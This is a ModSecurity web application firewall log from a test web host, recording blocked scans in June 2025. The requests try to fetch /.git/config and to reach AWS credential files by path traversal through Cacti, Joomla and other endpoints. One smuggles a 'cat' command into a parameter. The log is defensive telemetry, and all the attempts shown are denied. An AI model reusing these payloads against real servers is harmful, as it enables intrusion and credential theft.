[Sat Jun 07 15:23:24.823148 2025] [:error] [pid 3689097] [client 93.123.109.105:48876] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEQ9TL89yOF-nFEmsh9j8wAAAAg"]
[Sat Jun 07 15:23:24.823430 2025] [:error] [pid 3689097] [client 93.123.109.105:48876] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEQ9TL89yOF-nFEmsh9j8wAAAAg"]
[Sat Jun 07 15:23:24.823584 2025] [:error] [pid 3689097] [client 93.123.109.105:48876] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aEQ9TL89yOF-nFEmsh9j8wAAAAg"]
[Sun Jun 08 02:26:01.711194 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYmRHYI3qyoazfXO0cSgAAAAc"]
[Sun Jun 08 02:26:01.711271 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYmRHYI3qyoazfXO0cSgAAAAc"]
[Sun Jun 08 02:26:01.711328 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYmRHYI3qyoazfXO0cSgAAAAc"]
[Sun Jun 08 02:26:01.711952 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYmRHYI3qyoazfXO0cSgAAAAc"]
[Sun Jun 08 02:26:01.712120 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/pms"] [unique_id "aETYmRHYI3qyoazfXO0cSgAAAAc"]
[Sun Jun 08 02:26:10.726328 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYohHYI3qyoazfXO0cTgAAAAc"]
[Sun Jun 08 02:26:10.726400 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat%20../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYohHYI3qyoazfXO0cTgAAAAc"]
[Sun Jun 08 02:26:10.726444 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYohHYI3qyoazfXO0cTgAAAAc"]
[Sun Jun 08 02:26:10.726479 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /cacti/cmd_realtime.php?action=polldata&host_id=1&local_data_id=1 cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYohHYI3qyoazfXO0cTgAAAAc"]
[Sun Jun 08 02:26:10.726655 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:l[\\\\\\\\'\\"]* ..." at ARGS:local_data_id. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "123"] [id "932100"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: ;cat ../../../../../../../root/.aws/credentials found within ARGS:local_data_id: 1;cat ../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYohHYI3qyoazfXO0cTgAAAAc"]
[Sun Jun 08 02:26:10.727225 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYohHYI3qyoazfXO0cTgAAAAc"]
[Sun Jun 08 02:26:10.727382 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=0,RFI=0,LFI=20,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 25, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cacti/cmd_realtime.php"] [unique_id "aETYohHYI3qyoazfXO0cTgAAAAc"]
[Sun Jun 08 02:26:11.585774 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYoxHYI3qyoazfXO0cTwAAAAc"]
[Sun Jun 08 02:26:11.585987 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYoxHYI3qyoazfXO0cTwAAAAc"]
[Sun Jun 08 02:26:11.586171 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/root/.aws/credentials"] [unique_id "aETYoxHYI3qyoazfXO0cTwAAAAc"]
[Sun Jun 08 02:26:12.330423 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUAAAAAc"]
[Sun Jun 08 02:26:12.330500 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=mediaList&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUAAAAAc"]
[Sun Jun 08 02:26:12.330541 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?option=com_media&view=medialist&tmpl=component&fieldid=filename&folder=../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUAAAAAc"]
[Sun Jun 08 02:26:12.331791 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUAAAAAc"]
[Sun Jun 08 02:26:12.331977 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUAAAAAc"]
[Sun Jun 08 02:26:12.972546 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUQAAAAc"]
[Sun Jun 08 02:26:12.972612 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUQAAAAc"]
[Sun Jun 08 02:26:12.972646 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php?file=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUQAAAAc"]
[Sun Jun 08 02:26:12.973108 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUQAAAAc"]
[Sun Jun 08 02:26:12.973290 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/index.php"] [unique_id "aETYpBHYI3qyoazfXO0cUQAAAAc"]
[Sun Jun 08 02:26:16.370014 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYqBHYI3qyoazfXO0cUwAAAAc"]
[Sun Jun 08 02:26:16.370076 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYqBHYI3qyoazfXO0cUwAAAAc"]
[Sun Jun 08 02:26:16.370115 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /ajax_dashboard.php?widget=../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYqBHYI3qyoazfXO0cUwAAAAc"]
[Sun Jun 08 02:26:16.370566 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYqBHYI3qyoazfXO0cUwAAAAc"]
[Sun Jun 08 02:26:16.370719 2025] [:error] [pid 3709561] [client 107.150.0.115:55980] [client 107.150.0.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/ajax_dashboard.php"] [unique_id "aETYqBHYI3qyoazfXO0cUwAAAAc"]
